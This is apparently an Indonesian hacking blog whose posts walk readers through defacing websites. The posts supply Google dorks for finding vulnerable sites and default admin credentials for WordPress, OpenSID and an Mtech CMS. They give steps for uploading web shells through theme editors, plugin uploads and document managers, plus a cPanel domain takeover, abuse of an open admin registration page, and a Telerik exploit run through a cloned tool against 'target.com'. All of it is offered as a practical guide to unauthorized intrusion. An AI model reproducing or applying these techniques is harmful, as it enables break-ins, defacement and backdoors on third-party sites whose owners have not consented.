Monday, May 25, 2020

Deface Metode default U/P cms Mtech

Yo whatsapp guys
Wellcome to my blog xixi..
Kali ini saya mendapatkan User dan Pass default dari cms Mtech Websolution yang lumayan baru kyknya dari cxsecurity xixi..

Metodenya sama seperti bypass admin, jadi gua ga perlu contohin lagi yak :v

#Exploit title:
Powered by © 2019 All Rights Reserved by MTech Websolution"
#Author : Zaen [+]Team : Purworejo6etar
#Dork :
"Powered by © 2019 All Rights Reserved by MTech"
#Login :/account/login
#User/pw: admin Filetypes for file upload allow only *.jpg, *.gif, *.png, *.bmp extension file.

 #NB: dork bisa dikembangkan, use your brain :)

 Happy hacking & thanks.
Referensi :
https://cxsecurity.com/issue/WLB-2020050178

Thursday, May 14, 2020

Cara Deface Take Over Domain with Cpanel

Hallo exploiter,
Kembali lagi ama saya Nararya.
Kali ini kita akan belajar cara deface take over domain with cpanel

Bahan bahanya :
- Cpanel
Syarat cpanel bisa take over domain :
$ addon domains atau aliases tidak nol
$ Support remote dns
- Kouta :v
- Alat :
https://hackertarget.com/reverse-ip-lookup
https://httpstatus.io
- Sc deface atau shell backdoor

Pertama pertama kalian salin ip cpanel
Kalian...
Trus kalian buka hackertarget.com lalu pastekan ip cpanel dan klik "FIND DNS A RECORDS FORM IP".
Jika sudah akan keluar banyak domain hasil dari reverse ip
Lalu kalian copy dan pastekan di httpstatus.io dan klik check status
Kalian cari web yang error , copy webnya lalu ke cpanel ~> addon domains atau alises. Kali ini saya menggunakan addon domains
Kalian masukan webnya tanpa https// atau http:// lalu klik add Domain. 

Jika berhasil diaddon domain akan muncul tulisan seperti gambar dibawah. 
Kalian pencet File Manager dan up shell atau sc deface kalian

Gampang kan teman teman :D
Sekian dr gw
Semoga bermanfaat

Monday, May 11, 2020

Cara Meracik atau Kembangin Dork

Hallo exploiter,
Kambali lagi ama saya Nararya.
Kali ini kita tidak akan membahas tentang deface melainkan tentang dork atau lebih tepatnya Google dork

Apa itu Google dork?
Google dork adalah seni hacking yang memanfaatkan kehandalah atau kecanggihan mesin pencarian google. Mungkin tehnik ini udah banyak yang mengetahui tp sedikit orang yang bisa kembangin atau meracik sebuah dork.

Bang, berbahaya kah Google dork itu?
Sebenarnya sangat berbahaya tergantung cara pemakainnya ada yang menggunakan dork untung mencari sesuatu dengan kata kunci Sql injection misalnya atau mencari yang lain. Si hacker juga dapat mencari direktory direkotory tersembunyi dari sebuah website dll
Contoh :
intitle:index of config.php misalnya,
Nanti akan muncul  banyak web yang direktorynya blom ditutup oleh admin atau developer.

Langsung aja ke cara meracik atau kembangin Google dork :
Pertama kalian harus tau arti dari inurl, intitle, intext, site, dan ext (yang terpenting tau pokok pokoknya saja)
Penjelasan :
inurl
~>Gunanya untuk mencari website yang diurl-nya terdapat string atau kata yang kita masukan.
Contah : inurl:php?id=, setelah didorking akan keluar web yang urlnya berisi php?id=
intitle
~>Mencari sebuah website yang menggunakan title, misalnya intitle:Nararya Gans maka akan keluar website yang bertitle Nararya Gans
intext
~> Untuk mencari sebuah kata atau kalimat pada suatu website atau page menggunakan dork contohnya intext:admin login, berarti mencari page atau website yang didalamnya terdapat text admin login.
site
~>mencari sebuah website atau domain misalnya mencari domain .com jadi dorknya site:.com
ext
~> extensi yang digunakan file misalnya mencari file.php maka dorknya ext:php

Langsung aja gw contohin caranya,
Kita akan kembangin dork sqli yaitu : inurl:php?id=
Kita akan mencoba mencari web vuln sqli domain com, caranya tinggal kalian tambahkan site:
Hasilnya... inurl:php?id= site:com

Nah yang muncul domain.com semua kan?

Misalnya lagi ingin membuat dork dorking shell?
intitle:index of cgi.php misalnya kalian kembangin tambahkan site:com atau tambahakan intext:
Contoh :
intitle:index of alfa.php intext:184k
Atau
intitle:index of wso.php intext:64k.

Atau mencari makanan?
intext:bakso ayam
intext:soto
Dll


Sebenernya membuat dork dan kembangin sangat mudah hanya perlu hafal arti dari inurl, intitle, intext, ext, site dll
Cukup segini aja pembahasannya
Semoga bermanfaat :D

Cara Deface WordPress U/P Default

Hallo Exploiter,
Kembali lagi bersama saya.
Kali ini kita akan deface proof of concept Wordpress u/p Default

Bahan bahan :
-Dork
intitle:"My Blog - My Wordpress Blog" site:.
intitle:"Hello World " intext:2020
inurl:/wp/
intitle:"Wordpress" site:.br
(Kembangin lagi gan)
*sfx:saran:kembanginnya dibagian site diganti ganti contoh :
intitle:"My Blog - My Wordpress Blog" site:.pl
-Kouta
- Exploit info:
Namaweb.com/wp-login.php
- Login Info:
User:admin
Pass:pass
Atau
User:admin
Pass:admin
- Kesabaran(Paling penting gan :v)

Pertama kalian dorking dulu, pilih salah satu site

Kedua masukan exploitnya..
Contoh :
https://spin99k.club/wp-login.php

Ketiga login dengan user & password di atas,kalo yang pertama ga bisa coba yang kedua,kalo ga bisa tinggalin aja karna ga vuln

Jika vuln akan langsung masuk ke dashboard admin

Jika kalian ingin up shell, cara pertama kalian pergi ke :
- Aprireance ~> themes editor ~> trus kalian ubah source code 404.php

Cara manggilnya :
- https://www.namaweb.com/wp-content/themes/nama themekalian/404.php
- https://www.namaweb.com/wp-content/themes/nama themes/404.php

Cara kedua adalah
- Plugins ~> Add New ~> Upload plugins ~> Up shell kalian ber extensi .zip lalu klik install now
Kalo berhasil ada tulisan installed

Cara manggilnya :
- https://www.namaweb.com/wp-content/uploads/tahun/bulan/namashell.php

Cara ketiga adalah :
- Plugins ~> Add new ~> Search di Install plugins search "File Manager" lalu klik install dan active ~> Setelah aktif akan muncul tulisannya WP file manager nah lalu klik dan up shell



Sekian dr gw
Atas perhatianya..
Thans to: ./Buc1n

Sunday, May 10, 2020

Cara Deface poc Default cms SID


Hallo exploiter,
kembali lagi sama saya.
kali ini kita akan deface proof of concept Default cms SID

Bahan:
- Dork:
powered by: combine.or.id
Intext:"Powered by OpenSID"
(Kembangin lagi gan..)
- Shell backdoor
- Jso klo perlu
- Info login:
User: admin
Pass: sid304
atau
user: operator
pass: qwerty


Pertama kalian dorking kayak biasa..

Kalian pilih site nya yang menurut kalian vuln :v.. nanti akan otomatis ke halaman login nya.


login dengan user & password di atas,kalo yang pertama ga bisa coba yang kedua,kalo ga bisa tinggalin aja karna ga vuln


Dan jika vuln, maka akan masuk ke dashboard
Jika kalian mau upload shell, kalian pergi ke menu:

Admin Web~>Dokumen~>tambah dokumen~> upshell klean disini.

akses shellnya:

https://sitetarget.web.id/assets/files/dokumen/shellkalian.php


Gimana teman teman gampang kan :D

Oke sekian postingan kali ini, jangan lupa tinggalkan komentar dibawah






Source:Palembang cyber team

Saturday, May 9, 2020

Cara Deface Poc Regristrasi Admin


Hallo exploiter,
Kembali lagi sama saya Nararya.
Kali ini kita akan deface proof of concept Regristrasi Admin.

Bahan bahannya :
1. Dork
Dork: intexrt:Powered by Komquest Solutions site:.in
2. Kouta gan :v
3. Exploit info:
admin/register.php
4. Sc deface
5. Dan shell backdoor
Ga punya shell backdoor?
Touch Me

1. Kalian dorking dulu menggunakan dork diatas

2. Pilih salah satu site yang menurut kalian vuln

3. Masukin exploit, jika vuln akan muncul seperti gambar dibawah.



4. Regsiter user sama passnya terserah kalian, email juga.

5. Selesai register kalian langsung aja login.

6. Up shell kalian atau sc deface



*note:Jika ingin tebas index usahakan backup :D


Gimana teman teman gampang kan :D

Oke sekian postingan kali ini, jangan lupa tinggalkan komentar dibawah




Source: Youtube

Cara Deface Telerik


Hallo Exploiter,
Kambali lagi sama saya Nararya.
Kali ini kita akan belajar cara deface proof of concept (poc) telerik.

Bahan-bahan:
1. Dork : inurl:/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx
2. Termux
3. Tool Exploiter Telerick

Tutorial :

1. Oke pertama kita pastinya harus ngedork dulu dulu menggunakan dork diatas,

2. Kalau udah dorking, pilih site yg situ anggap vuln, kalau vuln akan ada tulisan "Loading the Dialog..." Seperti gambar berikut.


3. Kemudia kalian buka termux
Lalu install tool Exploiter Telerick dengan perintah berikut.

$ pkg install python2
$ pip2 install requests
$ git clone https://github.com/tnlteam/telerickexploit
$ cd telerickexploit
$ python2 fuck.py -exploit target.com 48 hex 9

Lalu kalian tunggu prosesnya selesai

4. Jika berhasil akan muncul link panjang, seperti dibawah ini.


5. Kalian copy semua dan pastekan Dibrowser kalian.

6. Setelah buka Link nya, maka kalian akan diarahkan ke Uploader/Document Manager, disana ada tombol Upload, kalian klik aja


Lalu kalian upload sc deface kalian atau shell backdoor

Gimana teman teman gampang kan :D

Oke sekian postingan kali ini, jangan lupa tinggalkan komentar dibawah! :D